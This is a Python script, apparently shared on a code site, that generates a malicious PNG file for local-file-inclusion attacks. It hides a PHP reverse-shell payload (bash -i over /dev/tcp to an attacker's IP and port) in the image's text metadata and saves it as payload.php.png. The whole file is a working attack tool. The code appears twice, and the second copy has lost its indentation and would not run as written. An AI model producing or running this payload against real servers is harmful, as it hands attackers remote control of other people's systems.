Girbons/png_lfi.py

## png_lfi.py
import argparse

# requires pillow
from PIL import Image, PngImagePlugin


shell = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'"); ?>"""


def create_png_image(ip, port):
    im = Image.new("RGB", (10, 10), "Black")
    im.info["shell"] = shell.format(ip, port)
    reserved = ("interlace", "gamma", "dpi", "transparency", "aspect")

    meta = PngImagePlugin.PngInfo()

    for k, v in im.info.items():
        if k in reserved:
            continue

        meta.add_text(k, v, 0)

    im.save("payload.php.png", "PNG", pnginfo=meta)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("ip")
    parser.add_argument("port")

    args = parser.parse_args()

    create_png_image(args.ip, args.port)
	import argparse

	# requires pillow
	from PIL import Image, PngImagePlugin


	shell = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'"); ?>"""


	def create_png_image(ip, port):
	im = Image.new("RGB", (10, 10), "Black")
	im.info["shell"] = shell.format(ip, port)
	reserved = ("interlace", "gamma", "dpi", "transparency", "aspect")

	meta = PngImagePlugin.PngInfo()

	for k, v in im.info.items():
	if k in reserved:
	continue

	meta.add_text(k, v, 0)

	im.save("payload.php.png", "PNG", pnginfo=meta)


	if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument("ip")
	parser.add_argument("port")

	args = parser.parse_args()

	create_png_image(args.ip, args.port)